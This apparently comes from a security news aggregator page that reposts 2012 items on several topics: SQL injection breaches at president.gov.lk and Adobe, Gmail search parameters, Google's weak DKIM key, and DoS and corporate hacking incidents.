Information Security, SSAE 16, ISO 27001, CISA, Cert-IN
<!– adsense –>Official website of President of Sri Lanka (president.gov.lk) breached by hacker going by name “Broken-Security”, using Blind Sql Injection vulnerability.
Vulnerability also posted by hacker on a pastebin note with database dump including table and column names.
Dump include the Username and Encrypted password of admin also as shown in screenshot. Hacker didn’t mention any reason
Original news article at https://thehackernews.com/ on November 22, 2012 at 10:24PM
CowboyRobot writes “Adobe today confirmed that one of its databases has been breached by a hacker and that it had temporarily taken offline the affected Connectusers.com website. The hacker, who also goes by Adam Hima, told Dark Reading that the server he attacked was the Connectusers.com Web server, and that he exploited a SQL injection flaw to execute the attack. ‘It was an SQL Injection vulnerability, somehow I was able to dump the database in less requests than normal people do,’ he says. Users passwords for the Adobe Connectusers site were stored and hashed with MD5, he says, which made them ‘easy to crack’ with freely available tools. And Adobe wasn’t using WAFs on the servers, he notes. Tal Beery, a security researcher at Imperva, analyzed the data dump in the Connectusers Pastebin post and found that the list appears to be valid and that the hacked database was relatively old.”
Read more of this story at Slashdot.
Original news article at https://slashdot.org/ on November 15, 2012 at 06:03AM
Google’s email service Gmail, or Google Mail, supports a variety of advanced search parameters which have not been documented that well until now. Recently it became known for instance that emails can be filtered by size using the size: parameter in the search form on the Gmail website.
Google today announced that all Gmail advanced search parameters are now available on a Searching Gmail support page. This includes the size parameter, but also additional parameters such as “older than” to find emails that are older than the specified age or “larger” which does the same as the size parameter.
Here is a short list of the most important advanced search parameters that you can use to search your emails on the Gmail website:
The search parameters are most effective when used in combination with search terms. You can for instance search for emails that are larger than a specified size sent by a particular contact of yours, or only last year’s emails that you received from a company. Parameters can also be combined, for instance to find all images larger than 10 Megabyte that have been sent before 2009: size:10m older_than:3y.
The support page lists additional search parameters and examples for each parameter which demonstrate how a particular parameter can be used in searches on the Gmail site.
Original news article at https://www.ghacks.net on November 15, 2012 at 04:25AM
If you need to find large attachments on Gmail quickly, you have a few options at your disposal. You can for instance use the Find Big Email service which automatically goes through all of your emails to sort them by size into groups. The program labels the emails accordingly so that you can quickly display all emails with attachments that are over a certain size.
While that is certainly handy, it means that you have to authorize the service for the operation, something that not all Gmail users may want to do considering that emails often contain important data that no one else should have access to.
Back then I explained how you can use a third party email program like Thunderbird to sort emails by size automatically, which is really helpful in this regard. While you need to install and configure the program first, you can display the sizes manually and without third party help.
There is however another option that you can use on Gmail’s website directly. The undocumented parameter size: enables you to display emails that are larger than the specified size. Use that together with a keyword, e.g. work, the name of a contact or an email address, and you have a filtering system that is easy to use and at the same time very efficient.
The size needs to be entered in bytes, a few examples are size:1000000 for files larger than 1 Megabyte, size:100000 for files larger than 100 Kilobyte or size:10000000 for attachments larger than 10 Megabyte. It is technically not fully correct, as one Megabyte is 1048576 Bytes, but that would make things more complicated as they should be. Just add keywords, email addresses or names to the search phrase to find the emails that you are looking for.
The size parameter can be really useful for a number of operations, for instance to delete large emails to free up space, or to locate a specific email that you know had a large attachment attached to it. (via TechSmog)
Original news article at https://www.ghacks.net on November 09, 2012 at 05:04PM
Two-factor authentication just got a whole lot more convenient for residents of Singapore, after Standard Chartered Bank’s local outfit teamed with MasterCard to offer account-holders a credit card that is also a one-time-password-generating hard token.
MasterCard calls the device a ‘Display Card’ and says it includes “an embedded LCD display and touch-sensitive buttons”.
Original news article at https://news.hitb.org/ on November 08, 2012 at 07:53AM
FBI officials quietly approached executives at Coca-Cola Co. (KO) on March 15, 2009, with some startling news.
Hackers had broken into the company’s computer systems and were pilfering sensitive files about its attempted $2.4 billion acquisition of China Huiyuan Juice Group (1886), according to three people familiar with the situation and an internal company document detailing the cyber intrusion. The Huiyuan deal, which collapsed three days later, would have been the largest foreign takeover of a Chinese company at the time.
Original news article at https://www.teamshatter.com on November 06, 2012 at 01:53AM
Our team (specifically Ramon Krikken | Phil Schacter | Eric Maiwald | Dan Blum | Mario de Boer | Anton Chuvakin) has just released an annual security planning guide: “2013 Planning Guide: Security and Risk Management.” Every GTP customer should go and read it! It’s abstract states that “The Nexus of Forces brings great opportunities and risks. This Planning Guide provides information security and risk teams with invaluable insights for prioritizing security and risk projects in 2013.”
In the guide, our team tackles the following topics:
Here are a few fun quotes:
Finally, I know that some of my esteemed blog readers are upset that I occasionally post links to materials requiring various forms of Gartner subscriptions. Well…mmm…get a subscription already!
Related posts:
Original news article at https://blogs.gartner.com/anton-chuvakin on November 03, 2012 at 12:08AM
Mathematician Zach Harris, 35, of Jupiter, Fl., poses for a portrait on Tuesday. Photo: Brynn Anderson/Wired
It was a strange e-mail, coming from a job recruiter at Google, asking Zachary Harris if he was interested in a position as a site-reliability engineer.
“You obviously have a passion for Linux and programming,” the e-mail from the Google recruiter read. “I wanted to see if you are open to confidentially exploring opportunities with Google?”
Harris was intrigued, but skeptical. The e-mail had come to him last December completely out of the blue, and as a mathematician, he didn’t seem the likeliest candidate for the job Google was pitching.
So he wondered if the e-mail might have been spoofed – something sent from a scammer to appear to come from the search giant. But when Harris examined the e-mail’s header information, it all seemed legitimate.
Then he noticed something strange. Google was using a weak cryptographic key to certify to recipients that its correspondence came from a legitimate Google corporate domain. Anyone who cracked the key could use it to impersonate an e-mail sender from Google, including Google founders Sergey Brin and Larry Page.
The problem lay with the DKIM key (DomainKeys Identified Mail) Google used for its google.com e-mails. DKIM involves a cryptographic key that domains use to sign e-mail originating from them – or passing through them – to validate to a recipient that the domain in the header information on an e-mail is correct and that the correspondence indeed came from the stated domain. When e-mail arrives at its destination, the receiving server can look up the public key through the sender’s DNS records and verify the validity of the signature.
For security reasons, the DKIM standard calls for using keys that are at least 1,024 bits in length. But Google was using a 512-bit key – which could be easily cracked with a little cloud-computing help.
Harris thought there was no way Google would be so careless, so he concluded it must be a sly recruiting test to see if job applicants would spot the vulnerability. Perhaps the recruiter was in on the game; or perhaps it was set up by Google’s tech team behind the scenes, with recruiters as unwitting accomplices.
Harris wasn’t interested in the job at Google, but he decided to crack the key and send an e-mail to Google founders Brin and Page, as each other, just to show them that he was onto their game.
“I love factoring numbers,” Harris says. “So I thought this was fun. I really wanted to solve their puzzle and prove I could do it.”
In the e-mail, he plugged his personal website:
Hey Larry,
Here’s an interesting idea still being developed in its infancy:
https://www.everythingwiki.net/index.php/What_Zach_wants_regarding_wiki_technology
or, if the above gives you trouble try this instead:
https://everythingwiki.sytes.net/index.php/What_Zach_wants_regarding_wiki_technology.
I think we should look into whether Google could get involved with this guy in some way. What do you think?
-Sergey
Harris made sure the return path for the e-mails went to his own e-mail account, so that Brin and Page could ask him how he’d cracked their puzzle. But Harris never got a response from the Google founders. Instead, two days later, he noticed that Google’s cryptographic key had suddenly changed to 2,048 bits. And he got a lot of sudden hits to his web site from Google IP addresses.
Oops, Harris thought, it was a real vulnerability he’d found.
Original news article at https://www.wired.com/threatlevel on October 24, 2012 at 04:00PM
Encrypt Stick is a simple and easy to use application that will encrypt your USB flash drive in order to protect your critical data such as personal information, pictures etc.
Original news article at https://www.topix.com/tech/computer-security on October 22, 2012 at 12:15AM
Websites belonging to British bank and financial services company HSBC are back online today after reportedly experiencing a denial of service (DoS) attack. The attack, which lasted approximately 10 hours last night, was deemed a “large scale denial of service attack” by the company.
Original news article at https://threatpost.com/en_us/frontpage on October 19, 2012 at 09:43PM